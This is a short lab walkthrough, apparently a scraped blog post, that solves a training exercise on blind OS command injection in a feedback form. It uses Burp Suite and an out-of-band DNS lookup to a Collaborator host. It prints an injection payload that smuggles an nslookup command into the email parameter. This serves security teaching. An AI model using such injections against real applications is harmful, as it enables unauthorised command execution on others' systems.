.png)
3 months ago
71 BOOK THIS SPACE FOR AD
ARTICLE ADThis lab contains a blind OS command injection The command is executed asynchronously and has no effect on response. It is not possible to redirect output into a location that you can access. To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator | Karthikeyan Nagaraj
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.
Click submit feedbackType some dummy values, capture the request, and send it to the repeaterIn Burp, click on the Burp Menu and click Burp Collaborator clientClick Copy to Clipboard and set polling seconds to 1.Add this payload at the end of the email parameter with the Collaborator link that you copied and send the request.||nslookup+BURP_COLLABORATOR_CLIENT_URL||Once you receive the response from your collaborator, the lab will be solved.
Bengali (Bangladesh) · 
English (United States) ·